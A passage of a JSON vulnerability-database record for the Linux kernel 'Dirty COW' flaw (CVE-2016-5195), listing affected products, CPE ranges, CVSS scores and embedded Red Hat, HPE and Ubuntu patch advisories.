        "version": "26.0.1410.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "mxe series media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "35000"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.3"
      },
      {
        "model": "videoscape distribution suite video recording",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.144"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "email gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.406-3402.103"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "webex meetings server mr1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "msr4000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.99.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "visual quality experience tools server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.00"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "email gateway 7.6.405h1157986",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "linux enterprise software development kit sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "linux enterprise debuginfo sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "ar3200 v200r008c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.402"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.10"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "(comware r3108p03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51307)"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.4.113",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.83",
                "versionStartIncluding": "2.6.22",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.10.104",
                "versionStartIncluding": "3.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.12.66",
                "versionStartIncluding": "3.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.38",
                "versionStartIncluding": "3.13",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.44",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.35",
                "versionStartIncluding": "3.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.26",
                "versionStartIncluding": "4.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.7.9",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.8.3",
                "versionStartIncluding": "4.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Phil Oester.",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-5195",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-5195",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-5195",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-5195",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\". Linux kernel is prone to a local privilege-escalation vulnerability. \nLocal attackers may exploit this issue to gain elevated privileges. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security update\nAdvisory ID:       RHSA-2016:2110-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-2110.html\nIssue date:        2016-10-26\nCVE Names:         CVE-2016-5195 CVE-2016-7039 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Realtime (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR\nVirtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent\nEthernet Bridging(TEB) GRO support, is vulnerable to a stack overflow\nissue. It could occur while receiving large packets via GRO path; As an\nunlimited recursion could unfold in both VLAN and TEB modules, leading to a\nstack corruption in the kernel. (CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1375944 - CVE-2016-7039 kernel: remotely triggerable unbounded recursion in the vlan gro code leading to a kernel crash\n1384344 - CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakage\n\n6. Package List:\n\nRed Hat Enterprise Linux for Real Time for NFV (v. 7):\n\nSource:\nkernel-rt-3.10.0-327.36.3.rt56.238.el7.src.rpm\n\nnoarch:\nkernel-rt-doc-3.10.0-327.36.3.rt56.238.el7.noarch.rpm\n\nx86_64:\nkernel-rt-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Realtime (v. 7):\n\nSource:\nkernel-rt-3.10.0-327.36.3.rt56.238.el7.src.rpm\n\nnoarch:\nkernel-rt-doc-3.10.0-327.36.3.rt56.238.el7.noarch.rpm\n\nx86_64:\nkernel-rt-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\nkernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-5195\nhttps://access.redhat.com/security/cve/CVE-2016-7039\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/2706661\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYEKKsXlSAg2UNWIIRAmI+AJkB5tkOU2r9pjWJ4cYCSD9mtyJFBwCgt+er\nyvfTfHwrbVXZfa/y1n2XeMs=\n=LaOt\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03722en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbgn03722en_us\nVersion: 1\n\nHPESBGN03722 rev.1 - HPE Operations Agent, Local Escalation of Privilege\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-03-30\nLast Updated: 2017-03-30\n\nPotential Security Impact: Local: Escalation of Privilege\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA security vulnerability in Linux kernel, also known as \"Dirty COW\", has been\naddressed in HPE Operations Agent. This vulnerability could be exploited\nlocally to allow escalation of privilege. \n\nReferences:\n\n  - CVE-2016-5195 - Linux kernel vulnerability, Dirty \"COW\" \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HPE Operations agent software - v11.11, v11.12, v11.13, v11.14\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2016-5195\n      7.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n      7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following mitigation steps available to resolve the\nvulnerability in the impacted versions of HPE Operations Agent. Login to the Operations Agent system with root privileges  \n2. Update the system using \u0027yum update kernel\u0027 command\n3. Reboot the server using \u0027/sbin/shutdown -r now\u0027 command\n\nPlease contact HPE Technical Support if any assistance is needed regarding\nthe mitigation steps. \n\nHISTORY\nVersion:1 (rev.1) - 30 March 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n==========================================================================\nUbuntu Security Notice USN-3104-1\nOctober 20, 2016\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n\nSummary:\n\nThe system could be made to run programs as an administrator. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  linux-image-3.2.0-113-generic   3.2.0-113.155\n  linux-image-3.2.0-113-generic-pae  3.2.0-113.155\n  linux-image-3.2.0-113-highbank  3.2.0-113.155\n  linux-image-3.2.0-113-omap      3.2.0-113.155\n  linux-image-3.2.0-113-powerpc-smp  3.2.0-113.155\n  linux-image-3.2.0-113-powerpc64-smp  3.2.0-113.155\n  linux-image-3.2.0-113-virtual   3.2.0-113.155\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "db": "PACKETSTORM",
        "id": "141870"
      },
      {
        "db": "PACKETSTORM",
        "id": "139250"
      }
    ],
    "trust": 1.62
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40611",
        "trust": 0.5,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
